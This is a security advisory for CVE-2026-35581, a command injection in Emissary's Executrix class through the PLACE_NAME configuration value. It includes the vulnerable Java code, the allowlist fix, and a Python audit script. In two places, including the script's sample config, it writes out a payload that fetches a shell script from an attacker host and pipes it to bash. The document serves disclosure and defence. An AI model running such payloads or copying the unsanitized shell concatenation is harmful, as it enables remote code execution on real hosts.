CVE

CVE-2026-35581

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix

Summary

The Executrix utility class constructed shell commands by concatenating configuration-derived values, including the PLACE_NAME parameter, with insufficient sanitization. Only spaces were replaced with underscores, allowing shell metacharacters (;, |, $, `, (, ), etc.) to pass through into /bin/sh -c command execution.

Details

Vulnerable code — Executrix.java

Insufficient sanitization (line 132):

this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through

Shell sink (lines 1052–1058):

protected String[] getTimedCommand(final String c) {
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}

Data flow

  1. PLACE_NAME is read from a configuration file
  2. Executrix applies only a space-to-underscore replacement
  3. The placeName is used to construct temporary directory paths (tmpNames[DIR])
  4. tmpNames[DIR] is concatenated into a shell command string
  5. The command is executed via /bin/sh -c

Example payload

PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"

After the original sanitization: test;curl_attacker.com/shell.sh|bash;x

(semicolons, pipes, and other metacharacters preserved)

Impact

  • Arbitrary command execution on the Emissary host
  • Requires the ability to control configuration values (e.g., administrative access or a compromised configuration source)

Remediation

Fixed in PR #1290, merged into release 8.39.0.

The space-only replacement was replaced with an allowlist regex that replaces every character not matching [a-zA-Z0-9_-] with an underscore:

protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");
protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}

This ensures that any shell metacharacter in the PLACE_NAME configuration value is replaced with an underscore before it can reach a command string.

Tests were added to verify that parentheses, slashes, dots, hash, dollar signs, backslashes, quotes, semicolons, carets, and at-signs are all sanitized.

Workarounds

If upgrading is not immediately possible, ensure that PLACE_NAME values in all configuration files contain only alphanumeric characters, underscores, and hyphens.
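One way to apply this workaround is to audit configuration text for PLACE_NAME values that fall outside the allowlist. The script below is an added example, not Emissary code; the KEY = "value" line syntax, the # comment prefix, and the function names are assumptions, and the sample config is constructed.

```python
import re

# Same allowlist the fix uses: anything outside [a-zA-Z0-9_-] is invalid.
INVALID_PLACE_NAME_CHARS = re.compile(r"[^a-zA-Z0-9_-]")
# Assumed config syntax: PLACE_NAME = "value" (quotes optional), one per line.
PLACE_NAME_LINE = re.compile(r'^\s*PLACE_NAME\s*=\s*"?(.*?)"?\s*$')


def audit_place_names(config_text):
    """Return (line_no, value, bad_chars) for every non-compliant PLACE_NAME."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # assumed comment syntax
        match = PLACE_NAME_LINE.match(line)
        if not match:
            continue
        value = match.group(1)
        bad = sorted(set(INVALID_PLACE_NAME_CHARS.findall(value)))
        if bad or not value:
            findings.append((line_no, value, bad))
    return findings


def clean_place_name(value):
    """Python equivalent of the fixed cleanPlaceName(), for comparison only."""
    return INVALID_PLACE_NAME_CHARS.sub("_", value)


# Constructed sample config; line 3 carries the advisory's example payload.
SAMPLE_CONFIG = '''\
# constructed sample
PLACE_NAME = "UnixCommandPlace"
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
PLACE_NAME = "My Place"
SERVICE_NAME = "a;b"
'''

if __name__ == "__main__":
    for line_no, value, bad in audit_place_names(SAMPLE_CONFIG):
        print(f"line {line_no}: {value!r} has disallowed characters {bad}; "
              f"the fixed release would use {clean_place_name(value)!r}")
```

Values containing only spaces as the disallowed character were already neutralized by the original replacement, but they are still flagged because the workaround asks for strict allowlist compliance.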

CVSS Version

Base Score: 7.2
CVSS Version: 3.1
Score Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

References

  • https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v
  • https://nvd.nist.gov/vuln/detail/CVE-2026-35581
  • https://github.com/NationalSecurityAgency/emissary/pull/1290
  • https://github.com/NationalSecurityAgency/emissary

Basic Information

Ecosystem:
Base CVSS: 7.2
EPSS Probability: 0.00129%
EPSS Percentile: 0.31931%
Introduced Version: 0
Fix Available: 8.39.0
